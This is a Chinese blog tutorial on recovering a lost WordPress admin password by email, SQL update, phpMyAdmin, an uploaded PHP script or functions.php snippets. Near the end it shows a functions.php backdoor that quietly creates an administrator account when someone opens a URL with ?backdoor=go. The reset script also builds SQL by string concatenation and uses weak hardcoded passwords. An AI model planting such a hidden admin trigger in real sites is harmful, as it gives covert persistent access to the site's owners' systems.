朱纯树博客
VPS测评推荐网站
cloudacead cloudacead

wordpress忘记后台密码处理方法汇总教程

好多小伙伴都喜欢通常使用浏览器记录密码的方式去保存一些密码,小编也是这样,wordpress后台密码小编还喜欢用默认装时的,很长,经常会忘记或被清理垃圾清理掉,下面给大家介绍WordPress忘记后台密码的几种找回登录密码的方法。

方法一:

通过邮件取回,前提是你的主机空间支持发送邮件,这样你就可以点击 WordPress 登录页面的“忘记密码?”按操作即可找到。我尝试了用邮件密码找回的方式,却发现一直报 mail() 函数不支持,说明我的空间不支持邮件发送功能,登陆后台有忘记密码的链接,输入用户名或电子邮件地址(必须是安装 wordpress 时填写的邮箱),你的邮箱会收到到密码激活链接邮件。

方法二:

1.修改数据库重置密码,wordpress 的密码是以md5的形式存储在数据库中,管理员用户是存储在 wp_users 表中的。我用的是云服务器,直接 SSH 到服务器,直接执行 sql 语句,对于购买 VPS 的朋友,可以借用 phpmyadmin 等工具,如果你忘记了数据库的登录名及密码,可以查看你网站根目录下的 wp-config.php,其以明文记录了相关的数据库连接信息。
登录网站所在的虚拟主机或服务器—进入数据库管理(phpMyAdmin)界面—选择网站所用的数据库名称—点击进入 SQL 命令界面。

wordpress忘记后台密码处理方法汇总教程插图

2.在 SQL 界面,执行以下命令,此时,将用户名为 admin 的账号, 密码重置为 123456,大家也可把 123456 换成自己设置的密码。

update wp_users set user_pass=md5("123456") where user_login='admin';

wordpress忘记后台密码处理方法汇总教程插图1

方法三:

过 phpMyAdmin 登录数据库,在 wp_users 表中重置密码:
1、登录网站所在的虚拟主机或服务器—进入数据库管理(phpMyAdmin)界面—选择网站所用的数据库名称—找到系统用户管理表 wp_users—选择浏览,查看此表中字段的内容。

wordpress忘记后台密码处理方法汇总教程插图2

2、点击浏览后,进入以下界面,查询出网站所有后台管理账号,user_login 字段为登录用户名,user_pass 为登录密码,点击所要修改用户名前的编辑图标。

wordpress忘记后台密码处理方法汇总教程插图3

3、点击编辑后,在 user_pass 字段中,函数选择 MD5,值填写要设置的登录密码,执行即可。

wordpress忘记后台密码处理方法汇总教程插图4

我们在数据库中看到的一大串的 WordPress 登录密码,是加密密码,当需要生成用户密码时,随机产生了一个 salt,然后将 salt 和 password 相加,又进行了 count 次 md5,最后和 encode64 的 hash 数值累加,就得到了一个以$P$开头的密码,这个密码每次产生的结果都不一样。

方法四:

将以下代码复制,修改数据库服务器地址、数据库用户名、数据库密码、数据库名称、用户新密码、新密码用户名(用户名一定要填写正确,密码才能重置成功),然后保存为 change-wp-password.php 文件,上传至网站的根目录,运行 http://你的域名/change-wp-password.php,即可。

<?php
/*你的数据库服务器地址,一般保持默认*/
$servername = "hdm325607133.my3w.com:3306";
/*数据库用户名*/
$phpMyadminUser = "hdm325607133";
/*数据库密码*/
$phpMyadminKey = "Aa12345678";
/*数据库名称*/
$phpMyadminName = "hdm325607133_db";
/*wordpress数据表格前缀*/
$QZ = "wp_";
/*你要设置的wordpress新密码*/
$NewKey = "admin";
/*你要设置新密码的用户名*/
$wordpress_User = "admin";
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>wordpress密码找回工具</title>
</head>
<body>
<?php
error_reporting(0);
if(!mysql_connect($servername,$phpMyadminUser,$phpMyadminKey))
{
    echo "对不起,数据库链接出错。<br />";
}
else
{
    echo "数据库链接成功。<br />";
    mysql_select_db($phpMyadminName,mysql_connect($servername,$phpMyadminUser,$phpMyadminKey));
    if (!mysql_query("update ".$QZ."users set user_pass='".md5($NewKey)."' where user_login='".$wordpress_User."'"))
    {
        echo "对不起,修改密码失败。";
    }
    else
    {
        echo "修改密码成功。";
    }
}
?>
</body>
</html>

方法五:

将下面代码添加到当前主题函数模板functions.php最后:

// wp后台找回密码
global $wpdb;
$wpdb->query("UPDATE `wp_users` SET `user_pass`='21232f297a57a5a743894a0e4a801fc3' WHERE `user_login`='你的用户名'");

添加上述代码后,刷新一下页面,登录密码自动修改为:admin
修改完后记得将上述代码移除,修改前请做好数据库备份,以防万一。

方法六:

将下面代码添加到当前主题函数模板functions.php中,然后刷新页面会新建一个管理员账号:

// 新建一个管理账号
$user_email = '123@123.com';
$user_password = '123456';
if ( !username_exists( $user_email ) ) {
$user_id = wp_create_user( $user_email, $user_password, $user_email );
wp_update_user( array( 'ID' => $user_id, 'nickname' => $user_email ) );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
wp_die( '添加用户成功!' );
} else {
wp_die( '该用户已经存在,用后请移除本代码!' );
}

修改其中的邮件地址和密码,用后请移除本代码

登录新建的管理员账号,修改原来账号的密码或者直接删除原来的账号。
这段代码还有一个不可告人的功能,稍微改一下,变成后门。

if ($_GET['backdoor'] == 'go') {
$user_email = '123@123.com';
$user_password = '123456';
if ( !username_exists( $user_email ) ) {
$user_id = wp_create_user( $user_email, $user_password, $user_email );
wp_update_user( array( 'ID' => $user_id, 'nickname' => $user_email ) );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
wp_die( '添加用户成功!' );
} else {
wp_die( '该用户已经存在,用后请移除本代码!' );
}
}

只有打开一个特定的链接,比如:
https://你的域名/?backdoor=go
才会运行这段代码,并新建管理账号。

赞(0) 打赏
未经允许不得转载:VPS测评推荐网站 - 朱纯树博客 » wordpress忘记后台密码处理方法汇总教程

评论 1

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #0

    wordpress 忘记后台密码解决办法还是挺多的,typecho只能修改数据库,
    并且typecho加密方式是phpass,小白们修改起来有点吃力

    trees2年前 (2020-09-27)回复